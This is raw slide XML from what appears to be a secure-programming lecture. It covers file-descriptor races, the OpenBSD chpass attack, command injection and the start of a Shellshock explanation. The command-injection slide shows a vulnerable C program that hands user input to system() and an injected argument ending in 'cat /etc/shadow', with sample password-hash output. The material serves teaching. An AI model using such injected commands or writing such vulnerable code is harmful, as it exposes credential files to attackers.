          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>		return -1;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>write(fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, count);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37732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5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451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451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4512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4512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451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Vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>These vulnerabilities are introduced because the application is not able to correctly handle unexpected events</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Unexpected input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Unexpected errors/exceptions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Unexpected interleaving of events</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Unfiltered output</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="45722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Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Lessons Learned</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="646147" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use versions of system calls that use file descriptors instead of file path names</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Perform file descriptor binding first</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For temp file use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mkstemp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(), which creates a file AND opens it</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="70472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6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2" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>File Handler Reuse</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="519173" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SUID applications open files to perform their tasks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sometimes they fork external processes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If the close-on-exec flag is not set, the new process will inherit the open file descriptors of the original program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The open files might provide access to security-sensitive information</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="160780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91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917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917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917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8" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>The chpass Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="525319" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>chpass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>" command on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>OpenBSD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> systems allows unprivileged users to edit database information associated with their account</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>chpass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> creates a temporary copy of the password database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>spawning an editor to display and modify user account information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>committing the information into the temporary password file copy, which is then used to rebuild the password database </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Using an escape-to-shell feature of the vi editor it was possible to obtain a shell with an open file descriptor to the copy file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Arbitrary modifications will be merged in the original </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> file</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="73368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53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53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53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53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53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253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Learned</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Make sure that no open file descriptors are inherited by forked programs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="61232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6" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Command Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="417797" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Applications invoke external commands to carry out specific tasks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(&lt;string&gt;) executes a command specified in a string by calling</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="838200" lvl="1" indent="-381000"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -c &lt;string&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>popen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() opens a process by creating a pipe, forking, and invoking the shell as in system()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If the user can control the string passed to these functions, it can inject additional commands</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5650917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77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77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779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779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779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Simple Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a: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int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>argc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char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[]) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pP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char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[1024];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>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snprintf(cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, 1024, "cat /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>var/log/%s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>", argv[1]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  cmd[1023] = '\0';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pP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return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>system(cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>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prog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> "foo; cat /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>/shadow"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>/log/foo: file not found</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>root:$1$LtWqGee9$jLrc8CWVMx6oAA8WKzS5Z1:16661:0:99999:7:::</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>daemon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>:*:16652:0:99999:7:::</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8458200" y="5657850"/>
            <a:ext cx="685800" cy="342900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BD5F6748-727B-F942-A49F-96C7BB40957B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>65</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="209111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Real Example: Shellshock</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>On September 2014, a new bug in how bash processes its environment variable was disclosed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The bash program can pass its environment to other instances of bash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In addition to variables a bash instance can pass to another instance one or more function definitions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This is accomplished by setting environment variables whose value start with ‘()’ followed by a function definition</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The function definition is the executed by the interpreter to create the function  	</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="177439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Real Example: Shellshock</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>By appending commands to the function definition, it is possible to execute arbitrary code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example: If a user has access to a limited-access </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> account he/she can break out of the restricted shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When a command that is not the allowed one is requested, the original command is put in the variable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>$SSH_ORIGINAL_COMMAND</a:t>
